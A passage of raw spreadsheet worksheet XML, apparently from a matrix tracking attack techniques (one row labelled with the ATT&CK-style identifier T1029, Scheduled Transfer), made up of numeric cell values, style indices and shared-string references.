      <c r="HK10" s="103">
        <v>0</v>
      </c>
      <c r="HL10" s="103">
        <v>0</v>
      </c>
      <c r="HM10" s="104">
        <v>0</v>
      </c>
      <c r="HN10" s="105">
        <v>0</v>
      </c>
      <c r="HO10" s="106">
        <v>0</v>
      </c>
      <c r="HP10" s="497">
        <v>0</v>
      </c>
      <c r="HQ10" s="107">
        <v>0</v>
      </c>
      <c r="HR10" s="107">
        <v>0</v>
      </c>
      <c r="HS10" s="108">
        <v>0</v>
      </c>
      <c r="HT10" s="109">
        <v>0</v>
      </c>
      <c r="HU10" s="110">
        <v>0</v>
      </c>
      <c r="HV10" s="501">
        <v>0</v>
      </c>
      <c r="HW10" s="111">
        <v>0</v>
      </c>
      <c r="HX10" s="111">
        <v>0</v>
      </c>
      <c r="HY10" s="112">
        <v>0</v>
      </c>
      <c r="HZ10" s="113">
        <v>0</v>
      </c>
      <c r="IA10" s="114">
        <v>0</v>
      </c>
      <c r="IB10" s="503">
        <v>0</v>
      </c>
      <c r="IC10" s="115">
        <v>0</v>
      </c>
      <c r="ID10" s="115">
        <v>0</v>
      </c>
      <c r="IE10" s="116">
        <v>0</v>
      </c>
      <c r="IF10" s="250">
        <v>0</v>
      </c>
      <c r="IG10" s="251">
        <v>0</v>
      </c>
      <c r="IH10" s="505">
        <v>0</v>
      </c>
      <c r="II10" s="252">
        <v>0</v>
      </c>
      <c r="IJ10" s="252">
        <v>0</v>
      </c>
      <c r="IK10" s="253">
        <v>0</v>
      </c>
      <c r="IL10" s="101">
        <v>0</v>
      </c>
      <c r="IM10" s="102">
        <v>0</v>
      </c>
      <c r="IN10" s="102">
        <v>0</v>
      </c>
      <c r="IO10" s="103">
        <v>0</v>
      </c>
      <c r="IP10" s="103">
        <v>0</v>
      </c>
      <c r="IQ10" s="104">
        <v>0</v>
      </c>
      <c r="IR10" s="105">
        <v>0</v>
      </c>
      <c r="IS10" s="106">
        <v>0</v>
      </c>
      <c r="IT10" s="497">
        <v>0</v>
      </c>
      <c r="IU10" s="107">
        <v>0</v>
      </c>
      <c r="IV10" s="107">
        <v>0</v>
      </c>
      <c r="IW10" s="108">
        <v>0</v>
      </c>
      <c r="IX10" s="109">
        <v>0</v>
      </c>
      <c r="IY10" s="110">
        <v>0</v>
      </c>
      <c r="IZ10" s="501">
        <v>0</v>
      </c>
      <c r="JA10" s="111">
        <v>0</v>
      </c>
      <c r="JB10" s="111">
        <v>0</v>
      </c>
      <c r="JC10" s="112">
        <v>0</v>
      </c>
      <c r="JD10" s="113">
        <v>0</v>
      </c>
      <c r="JE10" s="114">
        <v>0</v>
      </c>
      <c r="JF10" s="503">
        <v>0</v>
      </c>
      <c r="JG10" s="115">
        <v>0</v>
      </c>
      <c r="JH10" s="115">
        <v>0</v>
      </c>
      <c r="JI10" s="116">
        <v>0</v>
      </c>
      <c r="JJ10" s="101">
        <v>0</v>
      </c>
      <c r="JK10" s="102">
        <v>0</v>
      </c>
      <c r="JL10" s="102">
        <v>0</v>
      </c>
      <c r="JM10" s="103">
        <v>0</v>
      </c>
      <c r="JN10" s="103">
        <v>0</v>
      </c>
      <c r="JO10" s="104">
        <v>0</v>
      </c>
      <c r="JP10" s="105">
        <v>0</v>
      </c>
      <c r="JQ10" s="106">
        <v>0</v>
      </c>
      <c r="JR10" s="497">
        <v>0</v>
      </c>
      <c r="JS10" s="107">
        <v>0</v>
      </c>
      <c r="JT10" s="107">
        <v>0</v>
      </c>
      <c r="JU10" s="108">
        <v>0</v>
      </c>
      <c r="JV10" s="109">
        <v>0</v>
      </c>
      <c r="JW10" s="110">
        <v>0</v>
      </c>
      <c r="JX10" s="501">
        <v>0</v>
      </c>
      <c r="JY10" s="111">
        <v>0</v>
      </c>
      <c r="JZ10" s="111">
        <v>0</v>
      </c>
      <c r="KA10" s="112">
        <v>0</v>
      </c>
      <c r="KB10" s="113">
        <v>0</v>
      </c>
      <c r="KC10" s="114">
        <v>0</v>
      </c>
      <c r="KD10" s="503">
        <v>0</v>
      </c>
      <c r="KE10" s="115">
        <v>0</v>
      </c>
      <c r="KF10" s="115">
        <v>0</v>
      </c>
      <c r="KG10" s="116">
        <v>0</v>
      </c>
      <c r="KH10" s="250">
        <v>0</v>
      </c>
      <c r="KI10" s="251">
        <v>0</v>
      </c>
      <c r="KJ10" s="505">
        <v>0</v>
      </c>
      <c r="KK10" s="252">
        <v>0</v>
      </c>
      <c r="KL10" s="252">
        <v>0</v>
      </c>
      <c r="KM10" s="253">
        <v>0</v>
      </c>
      <c r="KN10" s="101">
        <v>0</v>
      </c>
      <c r="KO10" s="102">
        <v>0</v>
      </c>
      <c r="KP10" s="102">
        <v>0</v>
      </c>
      <c r="KQ10" s="103">
        <v>0</v>
      </c>
      <c r="KR10" s="103">
        <v>0</v>
      </c>
      <c r="KS10" s="104">
        <v>0</v>
      </c>
      <c r="KT10" s="105">
        <v>0</v>
      </c>
      <c r="KU10" s="106">
        <v>0</v>
      </c>
      <c r="KV10" s="497">
        <v>0</v>
      </c>
      <c r="KW10" s="107">
        <v>0</v>
      </c>
      <c r="KX10" s="107">
        <v>0</v>
      </c>
      <c r="KY10" s="108">
        <v>0</v>
      </c>
      <c r="KZ10" s="109">
        <v>0</v>
      </c>
      <c r="LA10" s="110">
        <v>0</v>
      </c>
      <c r="LB10" s="501">
        <v>0</v>
      </c>
      <c r="LC10" s="111">
        <v>0</v>
      </c>
      <c r="LD10" s="111">
        <v>0</v>
      </c>
      <c r="LE10" s="112">
        <v>0</v>
      </c>
      <c r="LF10" s="113">
        <v>0</v>
      </c>
      <c r="LG10" s="114">
        <v>0</v>
      </c>
      <c r="LH10" s="503">
        <v>0</v>
      </c>
      <c r="LI10" s="115">
        <v>0</v>
      </c>
      <c r="LJ10" s="115">
        <v>0</v>
      </c>
      <c r="LK10" s="116">
        <v>0</v>
      </c>
      <c r="LL10" s="117">
        <v>2</v>
      </c>
      <c r="LM10" s="507">
        <v>2</v>
      </c>
      <c r="LN10" s="119">
        <v>1</v>
      </c>
      <c r="LO10" s="119">
        <v>1</v>
      </c>
      <c r="LP10" s="119">
        <v>1</v>
      </c>
      <c r="LQ10" s="119">
        <v>1</v>
      </c>
      <c r="LR10" s="119">
        <v>1</v>
      </c>
      <c r="LS10" s="119">
        <v>1</v>
      </c>
      <c r="LT10" s="382"/>
      <c r="LU10" s="117">
        <v>0</v>
      </c>
      <c r="LV10" s="118">
        <v>0</v>
      </c>
      <c r="LW10" s="507">
        <v>0</v>
      </c>
      <c r="LX10" s="119">
        <v>0</v>
      </c>
      <c r="LY10" s="119">
        <v>0</v>
      </c>
      <c r="LZ10" s="119">
        <v>0</v>
      </c>
      <c r="MA10" s="117">
        <v>0</v>
      </c>
      <c r="MB10" s="118">
        <v>0</v>
      </c>
      <c r="MC10" s="507">
        <v>0</v>
      </c>
      <c r="MD10" s="119">
        <v>0</v>
      </c>
      <c r="ME10" s="119">
        <v>0</v>
      </c>
      <c r="MF10" s="119">
        <v>0</v>
      </c>
      <c r="MG10" s="117">
        <v>0</v>
      </c>
      <c r="MH10" s="118">
        <v>0</v>
      </c>
      <c r="MI10" s="507">
        <v>0</v>
      </c>
      <c r="MJ10" s="119">
        <v>0</v>
      </c>
      <c r="MK10" s="119">
        <v>0</v>
      </c>
      <c r="ML10" s="119">
        <v>0</v>
      </c>
      <c r="MM10" s="117">
        <v>1</v>
      </c>
      <c r="MN10" s="118" t="s">
        <v>4152</v>
      </c>
      <c r="MO10" s="507">
        <v>1</v>
      </c>
      <c r="MP10" s="119" t="s">
        <v>2501</v>
      </c>
      <c r="MQ10" s="119">
        <v>1</v>
      </c>
      <c r="MR10" s="119">
        <v>1</v>
      </c>
      <c r="MS10" s="117">
        <v>0</v>
      </c>
      <c r="MT10" s="118">
        <v>0</v>
      </c>
      <c r="MU10" s="507">
        <v>0</v>
      </c>
      <c r="MV10" s="119">
        <v>0</v>
      </c>
      <c r="MW10" s="119">
        <v>0</v>
      </c>
      <c r="MX10" s="119">
        <v>0</v>
      </c>
      <c r="MY10" s="117">
        <v>0</v>
      </c>
      <c r="MZ10" s="118">
        <v>0</v>
      </c>
      <c r="NA10" s="507">
        <v>0</v>
      </c>
      <c r="NB10" s="119">
        <v>0</v>
      </c>
      <c r="NC10" s="119">
        <v>0</v>
      </c>
      <c r="ND10" s="119">
        <v>0</v>
      </c>
      <c r="NE10" s="117">
        <v>0</v>
      </c>
      <c r="NF10" s="118">
        <v>0</v>
      </c>
      <c r="NG10" s="507">
        <v>0</v>
      </c>
      <c r="NH10" s="119">
        <v>0</v>
      </c>
      <c r="NI10" s="119">
        <v>0</v>
      </c>
      <c r="NJ10" s="119">
        <v>0</v>
      </c>
      <c r="NK10" s="117">
        <v>0</v>
      </c>
      <c r="NL10" s="118">
        <v>0</v>
      </c>
      <c r="NM10" s="507">
        <v>0</v>
      </c>
      <c r="NN10" s="119">
        <v>0</v>
      </c>
      <c r="NO10" s="119">
        <v>0</v>
      </c>
      <c r="NP10" s="119">
        <v>0</v>
      </c>
      <c r="NQ10" s="117">
        <v>0</v>
      </c>
      <c r="NR10" s="118">
        <v>0</v>
      </c>
      <c r="NS10" s="507">
        <v>0</v>
      </c>
      <c r="NT10" s="119">
        <v>0</v>
      </c>
      <c r="NU10" s="119">
        <v>0</v>
      </c>
      <c r="NV10" s="119">
        <v>0</v>
      </c>
      <c r="NW10" s="117">
        <v>1</v>
      </c>
      <c r="NX10" s="118" t="s">
        <v>4314</v>
      </c>
      <c r="NY10" s="507">
        <v>1</v>
      </c>
      <c r="NZ10" s="119" t="s">
        <v>2502</v>
      </c>
      <c r="OA10" s="119">
        <v>1</v>
      </c>
      <c r="OB10" s="119">
        <v>1</v>
      </c>
      <c r="OC10" s="120">
        <v>1</v>
      </c>
      <c r="OD10" s="120">
        <v>1</v>
      </c>
      <c r="OE10" s="120">
        <v>1</v>
      </c>
      <c r="OF10" s="120">
        <v>1</v>
      </c>
      <c r="OG10" s="120">
        <v>1</v>
      </c>
      <c r="OH10" s="120">
        <v>1</v>
      </c>
      <c r="OI10" s="120">
        <v>1</v>
      </c>
      <c r="OJ10" s="120">
        <v>1</v>
      </c>
      <c r="OK10" s="383"/>
      <c r="OL10" s="120">
        <v>1</v>
      </c>
      <c r="OM10" s="120">
        <v>1</v>
      </c>
      <c r="ON10" s="120">
        <v>1</v>
      </c>
      <c r="OO10" s="120" t="s">
        <v>2503</v>
      </c>
      <c r="OP10" s="120">
        <v>1</v>
      </c>
      <c r="OQ10" s="464">
        <v>1</v>
      </c>
      <c r="OR10" s="120">
        <v>0</v>
      </c>
      <c r="OS10" s="120">
        <v>0</v>
      </c>
      <c r="OT10" s="120">
        <v>0</v>
      </c>
      <c r="OU10" s="120"/>
      <c r="OV10" s="120">
        <v>0</v>
      </c>
      <c r="OW10" s="464">
        <v>0</v>
      </c>
      <c r="OX10" s="120">
        <v>0</v>
      </c>
      <c r="OY10" s="120">
        <v>0</v>
      </c>
      <c r="OZ10" s="120">
        <v>0</v>
      </c>
      <c r="PA10" s="120"/>
      <c r="PB10" s="120">
        <v>0</v>
      </c>
      <c r="PC10" s="464">
        <v>0</v>
      </c>
      <c r="PD10" s="120">
        <v>0</v>
      </c>
      <c r="PE10" s="120">
        <v>0</v>
      </c>
      <c r="PF10" s="120">
        <v>0</v>
      </c>
      <c r="PG10" s="120"/>
      <c r="PH10" s="120">
        <v>0</v>
      </c>
      <c r="PI10" s="464">
        <v>0</v>
      </c>
      <c r="PJ10" s="120">
        <v>0</v>
      </c>
      <c r="PK10" s="120">
        <v>0</v>
      </c>
      <c r="PL10" s="120">
        <v>0</v>
      </c>
      <c r="PM10" s="120"/>
      <c r="PN10" s="120">
        <v>0</v>
      </c>
      <c r="PO10" s="464">
        <v>0</v>
      </c>
      <c r="PP10" s="120">
        <v>0</v>
      </c>
      <c r="PQ10" s="120">
        <v>0</v>
      </c>
      <c r="PR10" s="120">
        <v>0</v>
      </c>
      <c r="PS10" s="120"/>
      <c r="PT10" s="120">
        <v>0</v>
      </c>
      <c r="PU10" s="464">
        <v>0</v>
      </c>
      <c r="PV10" s="120">
        <v>0</v>
      </c>
      <c r="PW10" s="120">
        <v>0</v>
      </c>
      <c r="PX10" s="120">
        <v>0</v>
      </c>
      <c r="PY10" s="120"/>
      <c r="PZ10" s="120">
        <v>0</v>
      </c>
      <c r="QA10" s="464">
        <v>0</v>
      </c>
      <c r="QB10" s="120">
        <v>0</v>
      </c>
      <c r="QC10" s="120">
        <v>0</v>
      </c>
      <c r="QD10" s="120">
        <v>0</v>
      </c>
      <c r="QE10" s="120"/>
      <c r="QF10" s="120">
        <v>0</v>
      </c>
      <c r="QG10" s="464">
        <v>0</v>
      </c>
      <c r="QH10" s="120">
        <v>1</v>
      </c>
      <c r="QI10" s="120">
        <v>1</v>
      </c>
      <c r="QJ10" s="120">
        <v>1</v>
      </c>
      <c r="QK10" s="120" t="s">
        <v>1561</v>
      </c>
      <c r="QL10" s="120">
        <v>1</v>
      </c>
      <c r="QM10" s="464">
        <v>1</v>
      </c>
      <c r="QN10" s="120">
        <v>0</v>
      </c>
      <c r="QO10" s="120">
        <v>0</v>
      </c>
      <c r="QP10" s="120">
        <v>0</v>
      </c>
      <c r="QQ10" s="120"/>
      <c r="QR10" s="120">
        <v>0</v>
      </c>
      <c r="QS10" s="464">
        <v>0</v>
      </c>
      <c r="QT10" s="184"/>
      <c r="QU10" s="184"/>
      <c r="QV10" s="184"/>
      <c r="QW10" s="184"/>
      <c r="QX10" s="184"/>
      <c r="QY10" s="184"/>
      <c r="QZ10" s="184"/>
      <c r="RA10" s="184"/>
      <c r="RB10" s="184"/>
      <c r="RC10" s="184"/>
      <c r="RD10" s="184"/>
      <c r="RE10" s="184"/>
      <c r="RF10" s="184"/>
      <c r="RG10" s="184"/>
      <c r="RH10" s="184"/>
      <c r="RI10" s="184"/>
      <c r="RJ10" s="184"/>
      <c r="RK10" s="184"/>
      <c r="RL10" s="184"/>
      <c r="RM10" s="184"/>
      <c r="RN10" s="184"/>
      <c r="RO10" s="184"/>
      <c r="RP10" s="184"/>
      <c r="RQ10" s="184"/>
      <c r="RR10" s="184"/>
      <c r="RS10" s="184"/>
      <c r="RT10" s="184"/>
      <c r="RU10" s="184"/>
      <c r="RV10" s="184"/>
      <c r="RW10" s="184"/>
      <c r="RX10" s="184"/>
      <c r="RY10" s="184"/>
      <c r="RZ10" s="184"/>
      <c r="SA10" s="184"/>
      <c r="SB10" s="184"/>
      <c r="SC10" s="184"/>
      <c r="SD10" s="184"/>
      <c r="SE10" s="184"/>
      <c r="SF10" s="184"/>
      <c r="SG10" s="184"/>
      <c r="SH10" s="184"/>
      <c r="SI10" s="184"/>
      <c r="SJ10" s="184"/>
      <c r="SK10" s="184"/>
      <c r="SL10" s="184"/>
      <c r="SM10" s="184"/>
      <c r="SN10" s="184"/>
      <c r="SO10" s="184"/>
      <c r="SP10" s="184"/>
      <c r="SQ10" s="184"/>
      <c r="SR10" s="184"/>
      <c r="SS10" s="184"/>
      <c r="ST10" s="184"/>
      <c r="SU10" s="184"/>
      <c r="SV10" s="184"/>
      <c r="SW10" s="184"/>
      <c r="SX10" s="184"/>
      <c r="SY10" s="184"/>
      <c r="SZ10" s="184"/>
      <c r="TA10" s="184"/>
      <c r="TB10" s="184"/>
      <c r="TC10" s="184"/>
      <c r="TD10" s="184"/>
      <c r="TE10" s="184"/>
      <c r="TF10" s="184"/>
      <c r="TG10" s="184"/>
      <c r="TH10" s="184"/>
      <c r="TI10" s="184"/>
      <c r="TJ10" s="184"/>
      <c r="TK10" s="184"/>
      <c r="TL10" s="184"/>
      <c r="TM10" s="184"/>
      <c r="TN10" s="184"/>
      <c r="TO10" s="184"/>
      <c r="TP10" s="184"/>
      <c r="TQ10" s="184"/>
      <c r="TR10" s="184"/>
      <c r="TS10" s="184"/>
      <c r="TT10" s="184"/>
      <c r="TU10" s="184"/>
      <c r="TV10" s="184"/>
      <c r="TW10" s="184"/>
      <c r="TX10" s="184"/>
      <c r="TY10" s="184"/>
      <c r="TZ10" s="184"/>
      <c r="UA10" s="184"/>
      <c r="UB10" s="184"/>
      <c r="UC10" s="184"/>
      <c r="UD10" s="184"/>
      <c r="UE10" s="184"/>
      <c r="UF10" s="184"/>
      <c r="UG10" s="184"/>
      <c r="UH10" s="184"/>
      <c r="UI10" s="184"/>
      <c r="UJ10" s="184"/>
      <c r="UK10" s="184"/>
      <c r="UL10" s="184"/>
      <c r="UM10" s="184"/>
      <c r="UN10" s="184"/>
      <c r="UO10" s="184"/>
      <c r="UP10" s="184"/>
      <c r="UQ10" s="184"/>
      <c r="UR10" s="184"/>
      <c r="US10" s="184"/>
      <c r="UT10" s="184"/>
      <c r="UU10" s="184"/>
      <c r="UV10" s="184"/>
      <c r="UW10" s="184"/>
      <c r="UX10" s="184"/>
      <c r="UY10" s="184"/>
      <c r="UZ10" s="184"/>
      <c r="VA10" s="184"/>
      <c r="VB10" s="184"/>
      <c r="VC10" s="184"/>
      <c r="VD10" s="184"/>
      <c r="VE10" s="184"/>
      <c r="VF10" s="184"/>
      <c r="VG10" s="184"/>
      <c r="VH10" s="184"/>
      <c r="VI10" s="184"/>
      <c r="VJ10" s="184"/>
      <c r="VK10" s="184"/>
      <c r="VL10" s="184"/>
      <c r="VM10" s="184"/>
      <c r="VN10" s="184"/>
      <c r="VO10" s="184"/>
      <c r="VP10" s="184"/>
      <c r="VQ10" s="184"/>
      <c r="VR10" s="184"/>
      <c r="VS10" s="184"/>
      <c r="VT10" s="184"/>
      <c r="VU10" s="184"/>
      <c r="VV10" s="184"/>
      <c r="VW10" s="184"/>
      <c r="VX10" s="184"/>
      <c r="VY10" s="184"/>
    </row>
    <row r="11" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A11" s="82" t="s">
        <v>14</v>
      </c>
      <c r="B11" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C11" s="83" t="s">
        <v>318</v>
      </c>
      <c r="D11" s="83" t="s">
        <v>25</v>
      </c>
      <c r="E11" s="83">
        <f t="shared" si="2"/>
        <v>8</v>
      </c>
      <c r="F11" s="83" t="s">
        <v>26</v>
      </c>
      <c r="G11" s="94" t="s">
        <v>4</v>
      </c>
      <c r="H11" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I11" s="81" t="s">
        <v>826</v>
      </c>
      <c r="J11" s="85" t="s">
        <v>827</v>
      </c>
      <c r="K11" s="81" t="s">
        <v>828</v>
      </c>
      <c r="L11" s="81" t="s">
        <v>829</v>
      </c>
      <c r="M11" s="378" t="s">
        <v>187</v>
      </c>
      <c r="N11" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O11" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P11" s="91"/>
      <c r="Q11" s="379" t="s">
        <v>8</v>
      </c>
      <c r="R11" s="92" t="s">
        <v>830</v>
      </c>
      <c r="S11" s="93" t="s">
        <v>787</v>
      </c>
      <c r="T11" s="92" t="s">
        <v>831</v>
      </c>
      <c r="U11" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V11" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W11" s="96" t="s">
        <v>832</v>
      </c>
      <c r="X11" s="97" t="s">
        <v>833</v>
      </c>
      <c r="Y11" s="83" t="s">
        <v>834</v>
      </c>
      <c r="Z11" s="98" t="s">
        <v>835</v>
      </c>
      <c r="AA11" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB11" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC11" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD11" s="83"/>
      <c r="AE11" s="83"/>
      <c r="AF11" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG11" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH11" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI11" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ11" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK11" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL11" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM11" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN11" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO11" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP11" s="385" t="str">
        <f>M11&amp;"-frag"</f>
        <v>T1029-Scheduled_transfer-frag</v>
      </c>
      <c r="AQ11" s="358">
        <v>9</v>
      </c>
      <c r="AR11" s="100"/>
      <c r="AS11" s="100">
        <v>1</v>
      </c>
      <c r="AT11" s="100">
        <v>1</v>
      </c>
      <c r="AU11" s="100">
        <v>2</v>
      </c>
      <c r="AV11" s="92" t="s">
        <v>836</v>
      </c>
      <c r="AW11" s="100">
        <v>1</v>
      </c>
      <c r="AX11" s="100">
        <v>1</v>
      </c>
      <c r="AY11" s="100">
        <v>1</v>
      </c>
      <c r="AZ11" s="100">
        <v>2</v>
      </c>
      <c r="BA11" s="381"/>
      <c r="BB11" s="101">
        <v>5</v>
      </c>
      <c r="BC11" s="102" t="s">
        <v>2497</v>
      </c>
      <c r="BD11" s="102">
        <v>2</v>
      </c>
      <c r="BE11" s="103" t="s">
        <v>2498</v>
      </c>
      <c r="BF11" s="103">
        <v>2</v>
      </c>
      <c r="BG11" s="104">
        <v>1</v>
      </c>
      <c r="BH11" s="105">
        <v>3</v>
      </c>
      <c r="BI11" s="106" t="s">
        <v>1840</v>
      </c>
      <c r="BJ11" s="497">
        <v>3</v>
      </c>
      <c r="BK11" s="186" t="s">
        <v>1841</v>
      </c>
      <c r="BL11" s="107">
        <v>3</v>
      </c>
      <c r="BM11" s="108">
        <v>1</v>
      </c>
      <c r="BN11" s="109">
        <v>8</v>
      </c>
      <c r="BO11" s="110" t="s">
        <v>1980</v>
      </c>
      <c r="BP11" s="501">
        <v>5</v>
      </c>
      <c r="BQ11" s="187" t="s">
        <v>1981</v>
      </c>
      <c r="BR11" s="111">
        <v>5</v>
      </c>
      <c r="BS11" s="112">
        <v>2</v>
      </c>
      <c r="BT11" s="113">
        <v>63</v>
      </c>
      <c r="BU11" s="114" t="s">
        <v>2566</v>
      </c>
      <c r="BV11" s="503">
        <v>8</v>
      </c>
      <c r="BW11" s="115" t="s">
        <v>2567</v>
      </c>
      <c r="BX11" s="115">
        <v>4</v>
      </c>
      <c r="BY11" s="116">
        <v>7</v>
      </c>
      <c r="BZ11" s="250">
        <v>7</v>
      </c>
      <c r="CA11" s="251" t="s">
        <v>2568</v>
      </c>
      <c r="CB11" s="505">
        <v>5</v>
      </c>
      <c r="CC11" s="254" t="s">
        <v>2569</v>
      </c>
      <c r="CD11" s="252">
        <v>5</v>
      </c>
      <c r="CE11" s="253">
        <v>1</v>
      </c>
      <c r="CF11" s="101">
        <v>70</v>
      </c>
      <c r="CG11" s="102" t="s">
        <v>2570</v>
      </c>
      <c r="CH11" s="102">
        <v>13</v>
      </c>
      <c r="CI11" s="103" t="s">
        <v>2571</v>
      </c>
      <c r="CJ11" s="103">
        <v>9</v>
      </c>
      <c r="CK11" s="104">
        <v>7</v>
      </c>
      <c r="CL11" s="105">
        <v>0</v>
      </c>
      <c r="CM11" s="106">
        <v>0</v>
      </c>
      <c r="CN11" s="497">
        <v>0</v>
      </c>
      <c r="CO11" s="186">
        <v>0</v>
      </c>
      <c r="CP11" s="107">
        <v>0</v>
      </c>
      <c r="CQ11" s="108">
        <v>0</v>
      </c>
      <c r="CR11" s="109">
        <v>20</v>
      </c>
      <c r="CS11" s="110" t="s">
        <v>1932</v>
      </c>
      <c r="CT11" s="501">
        <v>5</v>
      </c>
      <c r="CU11" s="187" t="s">
        <v>1933</v>
      </c>
      <c r="CV11" s="111">
        <v>1</v>
      </c>
      <c r="CW11" s="112">
        <v>5</v>
      </c>
      <c r="CX11" s="113">
        <v>28</v>
      </c>
      <c r="CY11" s="114" t="s">
        <v>2131</v>
      </c>
      <c r="CZ11" s="503">
        <v>10</v>
      </c>
      <c r="DA11" s="115" t="s">
        <v>2132</v>
      </c>
      <c r="DB11" s="115">
        <v>6</v>
      </c>
      <c r="DC11" s="116">
        <v>7</v>
      </c>
      <c r="DD11" s="101">
        <v>0</v>
      </c>
      <c r="DE11" s="102">
        <v>0</v>
      </c>
      <c r="DF11" s="102">
        <v>0</v>
      </c>
      <c r="DG11" s="103">
        <v>0</v>
      </c>
      <c r="DH11" s="103">
        <v>0</v>
      </c>
      <c r="DI11" s="104">
        <v>0</v>
      </c>
      <c r="DJ11" s="105">
        <v>3</v>
      </c>
      <c r="DK11" s="106" t="s">
        <v>1840</v>
      </c>
      <c r="DL11" s="497">
        <v>3</v>
      </c>
      <c r="DM11" s="186" t="s">
        <v>1841</v>
      </c>
      <c r="DN11" s="107">
        <v>3</v>
      </c>
      <c r="DO11" s="108">
        <v>1</v>
      </c>
      <c r="DP11" s="109">
        <v>3</v>
      </c>
      <c r="DQ11" s="110" t="s">
        <v>1840</v>
      </c>
      <c r="DR11" s="501">
        <v>3</v>
      </c>
      <c r="DS11" s="187" t="s">
        <v>1841</v>
      </c>
      <c r="DT11" s="111">
        <v>3</v>
      </c>
      <c r="DU11" s="112">
        <v>1</v>
      </c>
      <c r="DV11" s="113">
        <v>38</v>
      </c>
      <c r="DW11" s="114" t="s">
        <v>2572</v>
      </c>
      <c r="DX11" s="503">
        <v>1</v>
      </c>
      <c r="DY11" s="115" t="s">
        <v>1894</v>
      </c>
      <c r="DZ11" s="115">
        <v>1</v>
      </c>
      <c r="EA11" s="116">
        <v>1</v>
      </c>
      <c r="EB11" s="250">
        <v>3</v>
      </c>
      <c r="EC11" s="251" t="s">
        <v>1840</v>
      </c>
      <c r="ED11" s="505">
        <v>3</v>
      </c>
      <c r="EE11" s="254" t="s">
        <v>1841</v>
      </c>
      <c r="EF11" s="252">
        <v>3</v>
      </c>
      <c r="EG11" s="253">
        <v>1</v>
      </c>
      <c r="EH11" s="101">
        <v>41</v>
      </c>
      <c r="EI11" s="102" t="s">
        <v>2573</v>
      </c>
      <c r="EJ11" s="102">
        <v>4</v>
      </c>
      <c r="EK11" s="103" t="s">
        <v>2574</v>
      </c>
      <c r="EL11" s="103">
        <v>4</v>
      </c>
      <c r="EM11" s="104">
        <v>1</v>
      </c>
      <c r="EN11" s="105">
        <v>0</v>
      </c>
      <c r="EO11" s="106">
        <v>0</v>
      </c>
      <c r="EP11" s="497">
        <v>0</v>
      </c>
      <c r="EQ11" s="186">
        <v>0</v>
      </c>
      <c r="ER11" s="107">
        <v>0</v>
      </c>
      <c r="ES11" s="108">
        <v>0</v>
      </c>
      <c r="ET11" s="109">
        <v>0</v>
      </c>
      <c r="EU11" s="110">
        <v>0</v>
      </c>
      <c r="EV11" s="501">
        <v>0</v>
      </c>
      <c r="EW11" s="187">
        <v>0</v>
      </c>
      <c r="EX11" s="111">
        <v>0</v>
      </c>
      <c r="EY11" s="112">
        <v>0</v>
      </c>
      <c r="EZ11" s="113">
        <v>3</v>
      </c>
      <c r="FA11" s="114" t="s">
        <v>1840</v>
      </c>
      <c r="FB11" s="503">
        <v>3</v>
      </c>
      <c r="FC11" s="115" t="s">
        <v>1841</v>
      </c>
      <c r="FD11" s="115">
        <v>3</v>
      </c>
      <c r="FE11" s="116">
        <v>1</v>
      </c>
      <c r="FF11" s="101">
        <v>5</v>
      </c>
      <c r="FG11" s="102" t="s">
        <v>2497</v>
      </c>
      <c r="FH11" s="102">
        <v>2</v>
      </c>
      <c r="FI11" s="103" t="s">
        <v>2498</v>
      </c>
      <c r="FJ11" s="103">
        <v>2</v>
      </c>
      <c r="FK11" s="104">
        <v>1</v>
      </c>
      <c r="FL11" s="105">
        <v>0</v>
      </c>
      <c r="FM11" s="106">
        <v>0</v>
      </c>
      <c r="FN11" s="497">
        <v>0</v>
      </c>
      <c r="FO11" s="186">
        <v>0</v>
      </c>
      <c r="FP11" s="107">
        <v>0</v>
      </c>
      <c r="FQ11" s="108">
        <v>0</v>
      </c>
      <c r="FR11" s="109">
        <v>5</v>
      </c>
      <c r="FS11" s="110" t="s">
        <v>2497</v>
      </c>
      <c r="FT11" s="501">
        <v>2</v>
      </c>
      <c r="FU11" s="187" t="s">
        <v>2498</v>
      </c>
      <c r="FV11" s="111">
        <v>2</v>
      </c>
      <c r="FW11" s="112">
        <v>1</v>
      </c>
      <c r="FX11" s="113">
        <v>5</v>
      </c>
      <c r="FY11" s="114" t="s">
        <v>2497</v>
      </c>
      <c r="FZ11" s="503">
        <v>2</v>
      </c>
      <c r="GA11" s="115" t="s">
        <v>2498</v>
      </c>
      <c r="GB11" s="115">
        <v>2</v>
      </c>
      <c r="GC11" s="116">
        <v>1</v>
      </c>
      <c r="GD11" s="250">
        <v>4</v>
      </c>
      <c r="GE11" s="251" t="s">
        <v>1902</v>
      </c>
      <c r="GF11" s="505">
        <v>2</v>
      </c>
      <c r="GG11" s="254" t="s">
        <v>1903</v>
      </c>
      <c r="GH11" s="252">
        <v>2</v>
      </c>
      <c r="GI11" s="253">
        <v>1</v>
      </c>
      <c r="GJ11" s="101">
        <v>9</v>
      </c>
      <c r="GK11" s="102" t="s">
        <v>2499</v>
      </c>
      <c r="GL11" s="102">
        <v>4</v>
      </c>
      <c r="GM11" s="103" t="s">
        <v>2500</v>
      </c>
      <c r="GN11" s="103">
        <v>4</v>
      </c>
      <c r="GO11" s="104">
        <v>2</v>
      </c>
      <c r="GP11" s="105">
        <v>0</v>
      </c>
      <c r="GQ11" s="106">
        <v>0</v>
      </c>
      <c r="GR11" s="497">
        <v>0</v>
      </c>
      <c r="GS11" s="186">
        <v>0</v>
      </c>
      <c r="GT11" s="107">
        <v>0</v>
      </c>
